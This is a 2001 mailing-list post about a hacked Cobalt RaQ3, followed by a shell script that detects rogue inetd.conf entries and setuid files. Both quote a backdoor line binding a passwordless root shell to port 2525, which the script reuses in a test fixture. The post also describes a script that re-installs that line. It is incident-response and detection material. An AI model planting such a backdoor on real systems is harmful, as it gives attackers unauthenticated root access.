[cobalt-security] [RaQ3] Hacked ... a summary
- Subject: [cobalt-security] [RaQ3] Hacked ... a summary
- From: Michael Stauber <michael@xxxxxxxxxxxxxx>
- Date: Wed, 14 Mar 2001 05:31:52 +0100
- Organization: Forumworld.com
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Hello,
my RaQ3 has also been hacked. Apparently with the DNS exploit posted earlier
on this list.
When I scanned for open ports I found the following unusual ones open:
2525 - unknown
7937 - unknown
7938 - unknown
2525 was neat. It came from an entry in inetd.conf:
2525 stream tcp nowait root /bin/sh -h
So there was the root backdoor without password.
Still unclear are the ports 7937 and 7938. Does anyone know what they're used
for? They seem to be commonly used on RaQ3s.
Due to the time and date when inetd.conf was modified I was able to find out
when the box was hacked. Unfortunately the hacker apparently shut the
syslog-facility down while he was in. So for the next 20 minutes after his
login there were no logfiles.
/root/.bash_history showed some interesting entries which were not from me.
So the attacker did not clean up properly. There was an nslookup on the
domain "soultwins.com" and named.conf had been opened with "vi". Additionally
the DNS file of a virtual site had been opened in "vi" as well. No changes
were visible in both files, though.
A search for fishy cronjobs turned up blank, but a search for executable
files with uid 0 revealed that there was a /usr/bin/bd, which was a
shellscript which upon execution edits inetd.conf to re-insert the backdoor
at port 2525 <groan>.
Since then telnet has been disabled on the site, ssh enabled and additionally
I run both logcheck and portsentry from http://psionic.com - Tools which I
can highly recommend.
Portsentry watches for portscans and if one is detected the IP address of the
scanning client is permanently blocked from accessing the box.
Logcheck checks the system logs for unusual events. Bind it to a cronjob and
you get emailed once an unusual event or obvious traces of an attack are
found.
Still, I'd really appreciate it if someone could share the knowledge of what
ports 7937 and 7938 are for on a RaQ3.
Thanks!
--
Kind regards / Best regards
Michael Stauber
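The two indicators Michael describes, an inetd.conf entry that binds a root shell to a bare port number and a setuid executable dropped in /usr/bin, can both be checked with a short script. The following is an added example, not code from the original post or from Cobalt; it assumes a POSIX sh with awk and find (present on the RaQ3's Red Hat-based system), and the inetd.conf lines, the /usr/bin/bd file and the directory layout it builds under mktemp are constructed fixtures for the demonstration.

```shell
#!/bin/sh
# Added example: detect the two artefacts from the post, an inetd.conf service
# whose server program is a shell (or whose service field is a bare port), and
# files carrying the setuid bit where no known-good binary should be.

# Print inetd.conf entries whose server program (field 6) is a shell, or whose
# service field (field 1) is a numeric port rather than a name from /etc/services.
# Output: service, user, program, and which of the two tests matched.
find_suspicious_inetd() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }            # skip blank lines and comments
        {
            svc = $1; user = $5; prog = $6
            is_shell   = (prog ~ /\/(sh|bash|ksh|csh|tcsh|zsh)$/)
            is_numeric = (svc ~ /^[0-9]+$/)
            if (is_shell || is_numeric)
                printf "%s\t%s\t%s\tshell=%d bare_port=%d\n", svc, user, prog, is_shell, is_numeric
        }' "$1"
}

# Regular files below the given roots with the setuid bit set.  On a real box
# point this at / and add "-user root", then diff the list against one taken
# from a clean install; /usr/bin/bd would not be on the clean list.
find_setuid_files() {
    find "$@" -type f -perm -4000 2>/dev/null | sort
}

# Build a constructed fixture tree (inetd.conf plus a fake setuid script) and
# echo its path.  Everything in here is sample data, not from a real RaQ3.
make_fixture() {
    d=$(mktemp -d) || return 1
    cat > "$d/inetd.conf" <<'EOF'
# constructed sample, modelled on an inetd.conf with one backdoor line added
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
2525 stream tcp nowait root /bin/sh -h
#pop-3  stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d
EOF
    mkdir -p "$d/usr/bin" "$d/bin"
    printf '#!/bin/sh\necho constructed-sample\n' > "$d/usr/bin/bd"   # stands in for the dropped script
    printf '#!/bin/sh\necho constructed-sample\n' > "$d/bin/ls"       # ordinary file, must not be flagged
    chmod 755 "$d/usr/bin/bd" "$d/bin/ls"
    chmod u+s "$d/usr/bin/bd"
    printf '%s\n' "$d"
}

# Demonstration against the fixture; on a real system use /etc/inetd.conf and /.
fx=$(make_fixture)
echo "== suspicious inetd.conf entries =="
find_suspicious_inetd "$fx/inetd.conf"
echo "== setuid files =="
find_setuid_files "$fx"
rm -rf "$fx"
```

The inetd check flags the 2525 line on both counts (shell program and numeric service name) while leaving the tcpd-wrapped services alone; the setuid sweep is the automated form of the "executable files with uid 0" search in the post, and is only useful when compared against a baseline from known-good media, since legitimate setuid binaries such as passwd will always appear.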